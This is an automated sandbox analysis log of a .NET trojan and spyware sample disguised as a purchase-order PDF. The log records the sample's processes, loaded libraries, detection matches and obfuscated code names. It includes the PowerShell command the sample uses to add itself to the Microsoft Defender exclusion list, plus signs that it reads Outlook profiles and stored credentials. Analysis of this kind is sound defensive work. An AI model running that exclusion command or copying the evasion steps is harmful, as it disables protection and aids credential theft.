            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/8@1/1
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_0040650A
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,5_2_0040434D
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ADES_PO_Confirmation_20250307_pdf.bat.exe.logJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rslwju2e.tyj.ps1Jump to behavior
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeVirustotal: Detection: 35%
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeReversingLabs: Detection: 65%
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeString found in binary or memory: _/adD
            Source: unknownProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Ru3Nvi5l2iT0GbGpTq.cs.Net Code: DOZBlLwonO System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3a3f5c0.1.raw.unpack, Ru3Nvi5l2iT0GbGpTq.cs.Net Code: DOZBlLwonO System.Reflection.Assembly.Load(byte[])
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 8032, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 520, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D46BF push edx; iretd 0_2_026D46C2
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D46BB push edx; iretd 0_2_026D46BE
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D4778 push ebp; iretd 0_2_026D477A
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D477B push ebp; iretd 0_2_026D4782
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D47B1 push esi; iretd 0_2_026D47B2
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: section name: .text entropy: 7.814135908756811
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, o8iFQLwBochUMBr0eaw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O5w1dW8v1L', 'UCt1NPyTBf', 'w7E1GjTlG0', 'dOH11NQxLE', 'kRe12D0Fdg', 'jnB1D2HFU0', 'uQM13r6Sd3'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, RPLZj5yGy4mANkcwfk.csHigh entropy of concatenated method names: 'dHRThpYPU7', 'EIkTL07cJR', 'Rg9TVLHf9S', 'PMUTyZKewl', 'y7STg8ZS5Y', 'GCwTYG21UI', 'KYIT9u36MS', 'VtKTa5JBe8', 'aLtTd5UcHK', 'W9nTN0rrFi'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, obYsXpsmjTAyib2UA0.csHigh entropy of concatenated method names: 'Dispose', 'mFPwZualxL', 'BdNbiCgT7m', 'xMV2lh9uQY', 'q78wApOpfL', 'QK4wz8s0Vk', 'ProcessDialogKey', 'muMbumIwsu', 'oq8bwvUKr1', 'dWkbbqd479'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, S2rj1fC9toV914MT84.csHigh entropy of concatenated method names: 'ks0gKMPptl', 'SQUgSgMFIt', 'gVXgCvdyBm', 'OPJgMQwdUT', 'in3gil4AEb', 'cO1gQdhplp', 'ILtgqfODVT', 'LWmgOA5XxU', 'uLEgEOjQf7', 'TBBgkyMl1A'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, cBeF6nW4EIJaEEshCQ.csHigh entropy of concatenated method names: 'afO9ro2VW3', 'aZC9AnvbsI', 'RuqauQY1OW', 'TedawpNhjt', 'kWH9vYvy2O', 'InT9SdSpi8', 'xAU98AnNue', 'N519CVOKf4', 'wqD9MeemOA', 'SHo9p4BwgF'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, sue0SQxK3yAIyR3D0n.csHigh entropy of concatenated method names: 'tTI9oBauXT', 'fuP9PVFJdE', 'ToString', 'NPC96XRGrA', 'N0D9sO2OMn', 'uiH9T17wFt', 'e2290XNpJ1', 'Ur79c6wKSt', 'vki9FZeqHg', 'b3T95sEkWu'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, RmIwsuZgq8vUKr1BWk.csHigh entropy of concatenated method names: 'SStdjRlUgG', 'UbrdiX91cg', 'WrXdQebOcL', 'JMwdqUZsv8', 'XhOdOIYwy5', 'iaidEtjBDm', 'EIGdkREMp9', 'sx3dt3y5mo', 'Nx9dXTbL1F', 'bVqdK8u4Mo'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, TZKVJEwu1S7Dwpl69xs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f7UNvmH0Iv', 'YQeNSRxV2T', 'GW1N8CwV5k', 'IBcNCpKIOC', 'mpyNMFmbgq', 'aAaNpjawgX', 'PZGNxG3dGr'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, mcKASmXIc4M5Zs7oyt.csHigh entropy of concatenated method names: 'UpCFHxySVL', 'YUjFfwoi5w', 'kmMFlxLCJK', 'MjnFhWAEJE', 'lQHFU49Ge1', 'uPmFLjEXlV', 'bVpFebvItO', 'LMjFVMHhVj', 'PWYFy01JW8', 'osKFnfosNy'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, P6MvSxq2AsLekko3kL.csHigh entropy of concatenated method names: 'wNCc3vnO63', 'OnycHEoCkb', 'ahscl7pgHL', 'XGFchrXRFI', 'BDScL1FwSR', 'strcefMUk4', 'CfYcy4oGx2', 'iwZcnBhkj4', 'mv8SjqAmCFffRUTLJB5', 'FxUqQSAsXWnTJ0ShsqJ'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, dq89XC800jLRxVaSeu.csHigh entropy of concatenated method names: 'G9FIV4w3rq', 'B0gIy2Oi0Y', 'xuFIj8RCW2', 'tE1IiY9goi', 'stfIqYXba4', 'Q7BIO83s5e', 'NXhIk9E1Bd', 'TTdItvj688', 'ofJIKvIyOZ', 'zybIvvpC4I'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, YNT12PbJuUTro0jRRL.csHigh entropy of concatenated method names: 'lPMl3sdHP', 'D54hyVw3A', 'oEhLcoo1e', 'elVeExdAu', 'iRfypkcs5', 'Nj1ng9HXE', 'EoudaF6m9fiWxi9Ydu', 'G8BMLih14qFpQy6xLZ', 'CLSQiHVFnMdRfbvtWi', 'iO2aRhGFB'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, ApXJhlzHg5w5KARFHc.csHigh entropy of concatenated method names: 'VbENLOobJg', 'gjMNVnchpu', 'HrONy9MK9S', 'oquNjlqbF9', 'DwXNim1mst', 'hAONqTd4Zr', 'OrnNO8pPr9', 'LvJN3pRIKp', 'hN2NHLsSoj', 'xswNf9mDcK'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, frYXE2mLkoFPualxLa.csHigh entropy of concatenated method names: 'FThdgVZEsc', 'KAfd98jjKp', 'crBddZ7IDc', 'aODdGN6p7H', 'meWd2GY1Yh', 'NAhd30YlhO', 'Dispose', 'uyha6ioIZf', 'ke4asJxY99', 'XrwaTQZyS6'
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, yT9wQTjL0bQLg61YXm.csHigh entropy of concatenated method names: 'n2LcRD57RE', 'mVOcsrdgJl', 'vaxc0yZgwW', 'hbTcF4jMA3', 'TpHc5gvqdf', 'OxI075glkh', 'Boo0WOP2RT', 'gYE0mZLWRv', 'HxK0rba8Tu', 'H9o0ZHxGo1'
